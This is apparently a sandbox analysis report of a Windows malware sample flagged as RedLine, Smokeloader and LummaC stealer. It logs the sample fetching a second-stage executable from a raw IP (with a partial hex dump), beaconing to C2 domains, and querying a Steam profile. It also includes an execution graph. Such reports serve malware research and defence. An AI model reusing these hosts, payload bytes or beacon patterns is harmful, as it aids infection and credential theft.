                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.515034914 CET1.1.1.1192.168.2.50x2108Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:53.739248037 CET1.1.1.1192.168.2.50x375fName error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.050884008 CET1.1.1.1192.168.2.50xc066Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.271794081 CET1.1.1.1192.168.2.50x7d9Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.496803999 CET1.1.1.1192.168.2.50xf856Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.636981964 CET1.1.1.1192.168.2.50xe940Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:54.777930021 CET1.1.1.1192.168.2.50x88e8No error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      • post-to-me.com
                                                                                                                                                                                                                                      • immureprech.biz
                                                                                                                                                                                                                                      • deafeninggeh.biz
                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • 176.113.115.19
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.549705176.113.115.19804724C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:42.512564898 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: ShareScreen
                                                                                                                                                                                                                                      Host: 176.113.115.19
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.838874102 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 07:18:43 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                      Last-Modified: Tue, 17 Dec 2024 07:15:01 GMT
                                                                                                                                                                                                                                      ETag: "5a000-629720e372f3a"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Length: 368640
                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 67 98 24 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 fa 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 91 97 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O)rGArGArGA=ArGA ArGA ArGA AerGA,<ArGArFA}rGA ArGA ArGA ArGARichrGAPELg$f&?w@ C)<B.text `.rdata#$@@.data=@p"@.rsrcB@@
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.838948965 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 24 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 6c 08 00 00 6a 0c 68 e0 25 44 00 e8 97 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                      Data Ascii: %$D;@Duljh%Dutu=uCjYeVYEtVPYYE}u7ujrYVj5TnDDu=DPY[UQeVEPuu
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839030027 CET1236INData Raw: e8 ef 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 f9 08 00 00 85 c0 74 0a e8 f0 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 6a 0c 68 00 26 44 00 e8 c9 15 00 00 83 65 e4 00 8b 75 08 3b 35 a4 b4 81 00 77 22 6a 04 e8 b9 0a 00 00 59 83 65 fc 00
                                                                                                                                                                                                                                      Data Ascii: u9EttM^jh&Deu;5w"jYeVYEEEjYUVuSW=D=TnDuSjhYYut3@PuVSYuuFVj5TnD
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839153051 CET1236INData Raw: 05 33 c0 66 89 06 8b 45 08 85 c0 74 03 83 08 ff e8 28 04 00 00 80 7d fc 00 8b 00 0f 84 ba 00 00 00 8b 4d f8 83 61 70 fd e9 ae 00 00 00 8d 45 f0 50 0f b6 03 50 e8 41 31 00 00 59 59 85 c0 74 5a 8b 4d f0 8b 81 ac 00 00 00 39 45 0c 73 1a 8a 03 88 07
                                                                                                                                                                                                                                      Data Ascii: 3fEt(}MapEPPA1YYtZM9EsE7,~3RVPSjqDP{FU33GPEVWSjpD4E8E;t3_UQMES]Vt
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839165926 CET1236INData Raw: 68 a0 0f 00 00 ff 30 83 c7 18 e8 b0 36 00 00 59 59 85 c0 74 0c 46 83 fe 24 7c d2 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d d4 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 63 f5 ff ff
                                                                                                                                                                                                                                      Data Ascii: h06YYtF$|3@_^$AD3SDVADW>t~tWWc&YBD|AD_t~uPBD|^[UE4ADD]jh&D3G}39TnDujh!YYu4AD9tnj5 Y;uu
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839231014 CET672INData Raw: 5e c9 c3 a1 ac b4 81 00 56 8b 35 9c b4 81 00 57 33 ff 3b f0 75 34 83 c0 10 6b c0 14 50 ff 35 a0 b4 81 00 57 ff 35 54 6e 44 00 ff 15 e4 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 ac b4 81 00 10 8b 35 9c b4 81 00 a3 a0 b4 81 00 6b f6 14 03 35 a0 b4 81
                                                                                                                                                                                                                                      Data Ascii: ^V5W3;u4kP5W5TnDD;u3x5k5hAj5TnDDF;tjh hWDF;uvW5TnDDN>~F_^UQQMASVqW3C}i0Dj?EZ@@Juj
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839241982 CET1236INData Raw: 00 8b 7d fc 8b 4d 0c c1 ff 04 4f 8d 4c 31 fc 83 ff 3f 76 03 6a 3f 5f 8b 5d f4 8d 1c fb 89 5d 10 8b 5b 04 89 59 04 8b 5d 10 89 59 08 89 4b 04 8b 59 04 89 4b 08 8b 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13
                                                                                                                                                                                                                                      Data Ascii: }MOL1?vj?_]][Y]YKYKY;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^E
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839261055 CET1236INData Raw: 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 c3 cc cc cc 68 20 27 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 40 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00
                                                                                                                                                                                                                                      Data Ascii: MB_^[h '@d5D$l$l$+SVW@D1E3PeuEEEEdMdY__^[]QUS]Vs35@DWEE{tN38NF38E@fMUS[EMt_I[LD
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839272022 CET1236INData Raw: 00 ff 35 8c b4 81 00 e8 d3 0a 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 88 b4 81 00 e8 be 0a 00 00 59 8b f0 89 75 dc 89 7d e4 89 75 e0 83 ee 04 89 75 dc 3b f7 72 57 e8 9a 0a 00 00 39 06 74 ed 3b f7 72 4a ff 36 e8 94 0a 00 00 8b f8 e8 84 0a 00 00
                                                                                                                                                                                                                                      Data Ascii: 5Y}tx5Yu}uu;rW9t;rJ65~5q9}u9Et}}Eu}hDD_YhDDOYE}u(oDjYu3C}tjYU
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.839282990 CET1236INData Raw: 0c 00 80 00 00 59 5d c3 8b 45 0c 83 c0 20 50 ff 15 dc 10 44 00 5d c3 8b ff 55 8b ec 8b 45 08 b9 68 43 44 00 3b c1 72 1f 3d c8 45 44 00 77 18 81 60 0c ff 7f ff ff 2b c1 c1 f8 05 83 c0 10 50 e8 50 ea ff ff 59 5d c3 83 c0 20 50 ff 15 d8 10 44 00 5d
                                                                                                                                                                                                                                      Data Ascii: Y]E PD]UEhCD;r=EDw`+PPY] PD]UME}`Q!Y] PD]UVuW3;uWWWWWF@t FFuV;6YFvvV
                                                                                                                                                                                                                                      Dec 17, 2024 08:18:43.959095001 CET1236INData Raw: bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 89 8d f4 fd ff ff 8b 49 fc 89 8d e4 fd ff ff c7 85 d8 fc ff ff 17 04 00 c0 c7 85 dc fc ff ff 01 00 00 00 89 85 e4 fc ff ff ff 15 c8 10 44 00 6a 00
                                                                                                                                                                                                                                      Data Ascii: EM0IDjD(PDuujnYhDPDM3[NU5sDYt]j/Y]UV5,FD5Dt!(FDtP5,FDt


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.549704104.21.56.704434724C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-17 07:18:41 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: ShareScreen
                                                                                                                                                                                                                                      Host: post-to-me.com
                                                                                                                                                                                                                                      2024-12-17 07:18:42 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 07:18:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8mNwvHdJWmDx%2B5pye43LmeidpVk04aRcQUntQEkvwnB6LkGAB3aOofqWRrGX%2BB47XzYZcxB5p2BprJM44VYH9I99Hn9B2k%2F1Mxp5YW%2Fr%2Bj9%2B6pCnFgGpTQtZ2NbWGNfmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3523ffec0aefa7-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1945&min_rtt=1941&rtt_var=737&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1476238&cwnd=161&unsent_bytes=0&cid=c979b3785aa00078&ts=653&x=0"
                                                                                                                                                                                                                                      2024-12-17 07:18:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                      2024-12-17 07:18:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.549706104.131.68.1804435064C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-17 07:18:49 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: immureprech.biz
                                                                                                                                                                                                                                      2024-12-17 07:18:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2024-12-17 07:18:50 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 07:18:50 GMT
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.54970845.77.249.794435064C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-17 07:18:52 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                      Host: deafeninggeh.biz
                                                                                                                                                                                                                                      2024-12-17 07:18:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                      2024-12-17 07:18:53 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 07:18:52 GMT
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.549715104.121.10.344435064C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-17 07:18:56 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2024-12-17 07:18:56 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 07:18:56 GMT
                                                                                                                                                                                                                                      Content-Length: 25665
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=962e3ca250d10fc8fbc2ea3a; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2024-12-17 07:18:56 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                      2024-12-17 07:18:57 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:02:18:38
                                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\DG55Gu1yGM.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\DG55Gu1yGM.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:499'712 bytes
                                                                                                                                                                                                                                      MD5 hash:F5F01C71D9AD196656CDCEEF7C1F12E6
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:02:18:44
                                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:368'640 bytes
                                                                                                                                                                                                                                      MD5 hash:2C0A5976C7D6D86506EB825C8D67A8B8
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:02:18:56
                                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636
                                                                                                                                                                                                                                      Imagebase:0x810000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:2.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:24.5%
                                                                                                                                                                                                                                        Signature Coverage:6.8%
                                                                                                                                                                                                                                        Total number of Nodes:637
                                                                                                                                                                                                                                        Total number of Limit Nodes:19
                                                                                                                                                                                                                                        execution_graph 64877 402c04 InternetOpenW 64878 402e55 64877->64878 64881 402c37 Hash 64877->64881 64898 40f8cf 64878->64898 64880 402e64 64889 42defd 64881->64889 64884 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64885 402e17 64884->64885 64886 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64885->64886 64887 402e29 InternetOpenUrlW 64886->64887 64887->64878 64888 402e44 InternetCloseHandle InternetCloseHandle 64887->64888 64888->64878 64891 42df0c 64889->64891 64892 42df1a 64889->64892 64891->64892 64896 42df4a 64891->64896 64905 42eac9 20 API calls __dosmaperr 64892->64905 64893 42df24 64906 42a59d 26 API calls _Deallocate 64893->64906 64895 402e09 64895->64884 64896->64895 64907 42eac9 20 API calls __dosmaperr 64896->64907 64899 40f8d8 64898->64899 64900 40f8da IsProcessorFeaturePresent 64898->64900 64899->64880 64902 40f94d 64900->64902 64908 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64902->64908 64904 40fa30 64904->64880 64905->64893 64906->64895 64907->64893 64908->64904 64909 40fc06 64910 40fc12 ___BuildCatchObject 64909->64910 64938 40fff3 64910->64938 64912 40fc19 64913 40fd6c 64912->64913 64916 40fc43 64912->64916 64959 4104d3 4 API calls 2 library calls 64913->64959 64915 40fd73 64960 42ffc9 28 API calls _Atexit 64915->64960 64924 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64916->64924 64953 42fcee 5 API calls __ehhandler$___std_fs_change_permissions@12 64916->64953 64918 40fd79 64961 42ff7b 28 API calls _Atexit 64918->64961 64921 40fd81 64922 40fc5c 64923 40fc62 64922->64923 64954 42fc92 5 API calls __ehhandler$___std_fs_change_permissions@12 64922->64954 64926 40fce3 64924->64926 64955 42a366 167 API calls 4 library calls 64924->64955 64949 4105ed 64926->64949 64929 40fce9 64930 40fcfe 64929->64930 64956 410623 GetModuleHandleW 64930->64956 64932 40fd05 64932->64915 64933 40fd09 64932->64933 64934 40fd12 64933->64934 64957 42ff6c 28 API calls _Atexit 64933->64957 64958 410182 13 API calls 2 library calls 64934->64958 64937 40fd1a 64937->64923 64939 40fffc 64938->64939 64962 41077b IsProcessorFeaturePresent 64939->64962 64941 410008 64963 428827 10 API calls 3 library calls 64941->64963 64943 41000d 64948 410011 64943->64948 64964 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64943->64964 64945 41001a 64946 410028 64945->64946 64965 428850 8 API calls 3 library calls 64945->64965 64946->64912 64948->64912 64966 426830 64949->64966 64952 410613 64952->64929 64953->64922 64954->64924 64955->64926 64956->64932 64957->64934 64958->64937 64959->64915 64960->64918 64961->64921 64962->64941 64963->64943 64964->64945 64965->64948 64967 410600 GetStartupInfoW 64966->64967 64967->64952 64968 432785 64973 432553 64968->64973 64971 4327ad 64978 43257e 64973->64978 64975 432771 64992 42a59d 26 API calls _Deallocate 64975->64992 64977 4326d0 64977->64971 64985 43d01c 64977->64985 64978->64978 64981 4326c7 64978->64981 64988 43c8ce 170 API calls 2 library calls 64978->64988 64980 432711 64980->64981 64989 43c8ce 170 API calls 2 library calls 64980->64989 64981->64977 64991 42eac9 20 API calls __dosmaperr 64981->64991 64983 432730 64983->64981 64990 43c8ce 170 API calls 2 library calls 64983->64990 64993 43c9f1 64985->64993 64987 43d037 64987->64971 64988->64980 64989->64983 64990->64981 64991->64975 64992->64977 64995 43c9fd ___BuildCatchObject 64993->64995 64994 43ca0b 65011 42eac9 20 API calls __dosmaperr 64994->65011 64995->64994 64997 43ca44 64995->64997 65004 43cfcb 64997->65004 64998 43ca10 65012 42a59d 26 API calls _Deallocate 64998->65012 65003 43ca1a __wsopen_s 65003->64987 65014 43f941 65004->65014 65007 43ca68 65013 43ca91 LeaveCriticalSection __wsopen_s 65007->65013 65011->64998 65012->65003 65013->65003 65015 43f964 